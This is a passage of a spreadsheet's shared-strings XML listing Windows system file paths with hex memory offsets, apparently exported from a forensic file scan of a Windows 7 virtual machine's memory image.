  <si>
    <t>\Windows\System32\en-US\ieui.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f4218</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\en-US\wmiutils.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f43f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netr28.inf_x86_neutral_980e8922b9be3562\netr28.in</t>
  </si>
  <si>
    <t>0xde6f46c0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcm28.inf_x86_neutral_57712de4f9c6d527\mdmcm28.</t>
  </si>
  <si>
    <t>0xde6f4948</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\en-US\WMIC.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f4cb8</t>
  </si>
  <si>
    <t>0xde6f5230</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spp_tokens_identity_11b267e2f2add041.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f5618</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spp_tokens_channels_ocur_c1b54526a616e8b6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f5978</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wialx006.inf_x86_neutral_3a78b4761e61c040\wialx00</t>
  </si>
  <si>
    <t>0xde6f5a98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spp_plugin-manifests-signed_d1e9d31c180bebd2.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f5eb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_sppui_5d3749c25cf4bbd3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f71c0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\megasas2.inf_x86_neutral_599d713507780ed4\megasas</t>
  </si>
  <si>
    <t>0xde6f73a0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnbr002.inf_x86_neutral_1d14699bf2d4d936\prnbr00</t>
  </si>
  <si>
    <t>0xde6f75e8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnky004.inf_x86_neutral_dfafbddbf301a9d0\prnky00</t>
  </si>
  <si>
    <t>0xde6f7868</t>
  </si>
  <si>
    <t>0xde6f7c58</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\{F74EE0D0-6BFE-4612-BDB</t>
  </si>
  <si>
    <t>F-4590F145454</t>
  </si>
  <si>
    <t>0xde6f7f18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netathr.inf_x86_neutral_c6f6c3fd633fd5e7\netathr.</t>
  </si>
  <si>
    <t>0xde6f8038</t>
  </si>
  <si>
    <t>0xde6f81c8</t>
  </si>
  <si>
    <t>0xde6f82c8</t>
  </si>
  <si>
    <t>\Windows\System32\WindowsPowerShell\v1.0\en-US\powershell.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6f8750</t>
  </si>
  <si>
    <t>\Users\Support\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini_x001B_[</t>
  </si>
  <si>
    <t>0xde6f9038</t>
  </si>
  <si>
    <t>0xde6f9368</t>
  </si>
  <si>
    <t>0xde6f9870</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wininet.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fa038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wkssvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fa408</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\sdclt.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fa778</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnxx002.inf_x86_neutral_385ccd442fb8f3bb\prnxx00</t>
  </si>
  <si>
    <t>0xde6faa98</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fb0c0</t>
  </si>
  <si>
    <t>\Windows\System32\msvfw32.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fb330</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_startere_d5453e150472d334.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fb4e0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmetri.inf_x86_neutral_ec5f50ab9ec6191a\mdmmetr</t>
  </si>
  <si>
    <t>i.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fb740</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\averfx2hbtv.inf_x86_neutral_30c25b3574f8bcf5\aver</t>
  </si>
  <si>
    <t>fx2hbtv.inf_x001B_[</t>
  </si>
  <si>
    <t>0xde6fb860</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_professionaln_9cb539d1523e9bbf.cdf-ms</t>
  </si>
  <si>
    <t>0xde6fbd18</t>
  </si>
  <si>
    <t>\Windows\System32\winevt\Logs\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fc168</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\multiprt.inf_x86_neutral_988a34fc912eab54\multipr</t>
  </si>
  <si>
    <t>0xde6fc350</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\kernel32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fc530</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiabr009.inf_x86_neutral_f9fcfafc6cd98b47\wiabr00</t>
  </si>
  <si>
    <t>9.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fcb68</t>
  </si>
  <si>
    <t>0xde6fcd68</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdm5674a.inf_x86_neutral_32e293dc839d3ea6\mdm5674</t>
  </si>
  <si>
    <t>0xde6fd6d0</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\WmiApSrv.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fd850</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\esrb.rs.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fda30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx00b.inf_x86_neutral_cbb4d358ebfaa1a3\prnlx00</t>
  </si>
  <si>
    <t>0xde6fdc80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wpdshext.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fe0f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnbr003.inf_x86_neutral_21c4516754f2bda5\prnbr00</t>
  </si>
  <si>
    <t>0xde6fe2b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmod.inf_x86_neutral_ff5c77294e038f67\mdmmod.in</t>
  </si>
  <si>
    <t>0xde6fe3d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_postmigres_web_997c3ff186280ede.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fe6b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_postmigres_data_8383ed297796e30e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6feb98</t>
  </si>
  <si>
    <t>0xde6fee50</t>
  </si>
  <si>
    <t>\Windows\System32\migwiz\en-US\wet.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ff1e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_wcn_06656d8dd047aafe.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ff5d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_wbem_xml_026f0f207227ebbc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ff850</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_wbem_tmf_026f0fb07227ea72.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6ffad0</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\en-US\WmiApSrv.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde6fff80</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\en-US\WMIsvc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde700398</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmusrg.inf_x86_neutral_5953e856037c5639\mdmusrg.</t>
  </si>
  <si>
    <t>0xde7004b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_tasks_5f1dd67a5a1ae70e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7006a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_sysprep_f7b45b8dfed1b768.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7008a0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\cpu.inf_x86_neutral_729b871528391032\cpu.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde700b78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wvmbusvideo.inf_x86_neutral_1b297af3587246aa\wvmb</t>
  </si>
  <si>
    <t>usvideo.inf_x001B_[</t>
  </si>
  <si>
    <t>0xde700f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_tasks_microsoft_b7abd682baafefc2.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7010f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\vboxguest.inf_x86_neutral_23dc2e07d081d8f1\VBoxGu</t>
  </si>
  <si>
    <t>est.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde701238</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_tasks_microsoft_windows_media_center_ad67db1bbb2dd336.cdf</t>
  </si>
  <si>
    <t>0xde701930</t>
  </si>
  <si>
    <t>0xde701f18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\tsgenericusbdriver.inf_x86_neutral_9002d2f3f0cfc5</t>
  </si>
  <si>
    <t>e0\tsgenericu</t>
  </si>
  <si>
    <t>sbdriver.in</t>
  </si>
  <si>
    <t>0xde702038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph6xib32c0.inf_x86_neutral_a7233f8f3a9f58ff\Ph6xI</t>
  </si>
  <si>
    <t>B32C0.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7021f0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\userenv.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7029d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_professional_5918bf2ee6a07e89.cdf-</t>
  </si>
  <si>
    <t>0xde702c68</t>
  </si>
  <si>
    <t>0xde702db8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_default_professionaln_d407d0a0ae39e19d.cdf</t>
  </si>
  <si>
    <t>0xde703298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_winbiodatabase_8ca29eba075c22c3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde703560</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgl003.inf_x86_neutral_4c78da9e48068043\mdmgl00</t>
  </si>
  <si>
    <t>0xde703680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_wdi_perftrack_traces_0af2b48360b94cec.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde703948</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\msdsm.inf_x86_neutral_cacb427259f0d93e\msdsm.inf_x001B_</t>
  </si>
  <si>
    <t>0xde703a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_wdi_perftrack_e5904ddd3f58b556.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde703e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_wcn_en-us_f42897ed07859b3c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde704038</t>
  </si>
  <si>
    <t>\Windows\System32\spool\drivers\w32x86\3\en-US\CNBPCOMM.DLL.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde704138</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spool_prtprocs_w32x86_en-us_5b08a36c001a2d60.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde704520</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spool_prtprocs_w32x86_ef52e6aef2b8011c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7047a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spool_drivers_w32x86_3_mui_0409_b123c2e8e96d758d.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde704bf0</t>
  </si>
  <si>
    <t>0xde704f18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmsmart.inf_x86_neutral_daedddd66ae49f4d\mdmsmar</t>
  </si>
  <si>
    <t>0xde705530</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spool_tools_microsoft_xps_document_writer_6c7957555c36ceb</t>
  </si>
  <si>
    <t>b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde705718</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spool_tools_en-us_103725fe114f4888.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7058b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\net1q32.inf_x86_neutral_18f9b5da166792ca\net1q32.</t>
  </si>
  <si>
    <t>0xde7059d0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\rndiscmp.inf_x86_neutral_4ca64d28e1be8fa9\rndiscm</t>
  </si>
  <si>
    <t>p.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde705db8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spool_tools_e03b2d8f300154a4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7062b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_sysprep_en-us_ed807a30a752749a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7066a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_sv-se_5d37410c5cf4ca56.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde706968</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnin003.inf_x86_neutral_dca922447801904c\prnin00</t>
  </si>
  <si>
    <t>0xde706e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_sr-latn-cs_36d1c3d11e65ce00.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7072c8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_th-th_5f1dc0505a1b09f7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7077b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_tasks_microsoft_windows_synccenter_6c995d37b2976a17.cdf-m</t>
  </si>
  <si>
    <t>0xde707b98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_tasks_microsoft_windows_remoteapp_and_desktop_connections</t>
  </si>
  <si>
    <t>_update_c0bea</t>
  </si>
  <si>
    <t>ecbfc21a5e1</t>
  </si>
  <si>
    <t>.cdf-m</t>
  </si>
  <si>
    <t>0xde707e60</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\sdbus.inf_x86_neutral_47b152eccdb186c8\sdbus.inf_x001B_</t>
  </si>
  <si>
    <t>0xde707f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_tasks_microsoft_windows_media_center_extender_02bff096ccf</t>
  </si>
  <si>
    <t>79441.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde708360</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_microsoft-international-core_</t>
  </si>
  <si>
    <t>05a14960964e6</t>
  </si>
  <si>
    <t>af4.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde708628</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnbr00a.inf_x86_neutral_e9f0919e54780621\prnbr00</t>
  </si>
  <si>
    <t>0xde708748</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_microsoft-activedirectory-web</t>
  </si>
  <si>
    <t>services_fbfc</t>
  </si>
  <si>
    <t>8031b6420fb</t>
  </si>
  <si>
    <t>6.cdf-</t>
  </si>
  <si>
    <t>0xde708b30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_174c7b92bb7d581f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde708f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_postmigres_web_base_images_0e64dea9756e1d4c.cdf-ms</t>
  </si>
  <si>
    <t>0xde709240</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\sisraid2.inf_x86_neutral_845e008c32615283\sisraid</t>
  </si>
  <si>
    <t>0xde709360</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_networklist_icons_2b49083c03963dec.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde709748</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_networklist_029a48465a9cac56.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde709b30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_nb-no_53b700d66b352886.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde709df8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmbr005.inf_x86_neutral_9d6675b8a97638e3\mdmbr00</t>
  </si>
  <si>
    <t>0xde709f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_mui_dispspec_d93de566344a36d0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70a148</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wialx003.inf_x86_neutral_c74d32723c75b87b\wialx00</t>
  </si>
  <si>
    <t>0xde70a298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_windowspowershell_v1.0_en-us_028e6949cac04f1d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70a560</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiabr002.inf_x86_neutral_001cc6b7e8835965\wiabr00</t>
  </si>
  <si>
    <t>0xde70a680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_windowspowershell_v1.0_3f102d555ee05d33.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70aa68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_winbioplugins_en-us_4600b46a9eff5ffa.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70ae50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_winbioplugins_071a28c5b510fb6a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70bb58</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B</t>
  </si>
  <si>
    <t>6E1C7C_CE50F8</t>
  </si>
  <si>
    <t>93881D43DC0</t>
  </si>
  <si>
    <t>C815E4</t>
  </si>
  <si>
    <t>D80FAF2B4_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70bd28</t>
  </si>
  <si>
    <t>\Users\Support\Videos\desktop.ini_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70c680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_ultimatee_1ea73fcb54424f75.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70ca68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_starter_151ea2a70dab9296.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70cd30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaep002.inf_x86_neutral_f695353fd0a22a29\wiaep00</t>
  </si>
  <si>
    <t>0xde70ce50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_startern_3099b14e9201d0a2.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70d038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_speech_engines_sr_en-us_50079c0208866964.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70d480</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_speech_speechux_en-gb_84f7bae6593a3452.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70d7b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnrc00c.inf_x86_neutral_d5646e537534e115\prnrc00</t>
  </si>
  <si>
    <t>0xde70d868</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_speech_speechux_bf4b53e8d47da913.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70dc50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_speech_engines_sr_f5f77fb9283237d8.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70df80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\tsusbhubfilter.inf_x86_neutral_19107dfee752ecbb\t</t>
  </si>
  <si>
    <t>susbhubfilter</t>
  </si>
  <si>
    <t>0xde70e3b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spp_tokens_ppdlic_0f09ba294211a24b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70e5a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spp_tokens_pkeyconfig_d8fc0830c525895a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70e7a0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgcs.inf_x86_neutral_4274c7a3888cef70\mdmgcs.in</t>
  </si>
  <si>
    <t>0xde70e988</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spp_tokens_skus_security-spp-component-sku-enterprise_058</t>
  </si>
  <si>
    <t>096d57f8bbba7</t>
  </si>
  <si>
    <t>0xde70eb38</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\sbp2.inf_x86_neutral_bfc02db3bc163c19\sbp2.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xde70eeb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_spp_tokens_issuance_2c48fd0ccc1c41cc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde70f148</t>
  </si>
  <si>
    <t>0xde70f298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-shmig-dl_45622e527f4</t>
  </si>
  <si>
    <t>70963.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde70f680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-rasserver-migplugin_</t>
  </si>
  <si>
    <t>9fbe397ae3412</t>
  </si>
  <si>
    <t>0be.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde70fa68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-rasconnectionmanager</t>
  </si>
  <si>
    <t>_2597396f593c</t>
  </si>
  <si>
    <t>1559.cdf-ms</t>
  </si>
  <si>
    <t>0xde70fd30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiaca00e.inf_x86_neutral_460d611128d40de9\wiaca00</t>
  </si>
  <si>
    <t>0xde70fe50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-rasapi_86cec7ccd5753</t>
  </si>
  <si>
    <t>cec.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde710ba0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB2719857_SP1~31bf3856ad364e35~x86~~6.1.1.2.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde711288</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_pt-pt_5783f7006581b92f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde711438</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\circlass.inf_x86_neutral_5bbf290689fced8f\circlas</t>
  </si>
  <si>
    <t>s.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde711780</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_printing_admin_scripts_en-us_f242a041737eb912.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde711a10</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ehstorcertdrv.inf_x86_neutral_2e1cecffae9c899a\eh</t>
  </si>
  <si>
    <t>storcertdrv.i</t>
  </si>
  <si>
    <t>nf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde711b30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wstorvsc.inf_x86_neutral_d7bf942e99bb1d41\wstorvs</t>
  </si>
  <si>
    <t>0xde711f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_pl-pl_5783e8f06581cd6f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde712038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_speech_speechux_en-us_84f7db2c593a03f7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde712460</t>
  </si>
  <si>
    <t>0xde712878</t>
  </si>
  <si>
    <t>0xde712c50</t>
  </si>
  <si>
    <t>\Windows\System32\Speech\SpeechUX\en-us\speechuxcpl.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde712f18</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\net44x32.inf_x86_neutral_70a6663fd52fa256\net44x3</t>
  </si>
  <si>
    <t>0xde714360</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_oobe_en-us_e44fe14df02b3595.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde714628</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiabr008.inf_x86_neutral_73557b9c99d61d54\wiabr00</t>
  </si>
  <si>
    <t>8.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde714748</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_oobe_06655c95df2fa06f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde714b30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_nl-nl_53b6f9bc6b35343b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde714f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_networklist_icons_stockicons_c7f9dde8d52dc62c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde715298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_windowspowershell_v1.0_modules_bitstransfer_en-us_8f6d532</t>
  </si>
  <si>
    <t>2d8d680dd.cdf</t>
  </si>
  <si>
    <t>0xde715560</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmdsi.inf_x86_neutral_5352518dfa03c76f\mdmdsi.in</t>
  </si>
  <si>
    <t>0xde715680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_windowspowershell_v1.0_modules_bitstransfer_935cce3b0456e</t>
  </si>
  <si>
    <t>b87.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde715a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_windowspowershell_v1.0_modules_applocker_en-us_0185315044</t>
  </si>
  <si>
    <t>ae185f.cdf-ms</t>
  </si>
  <si>
    <t>0xde715e50</t>
  </si>
  <si>
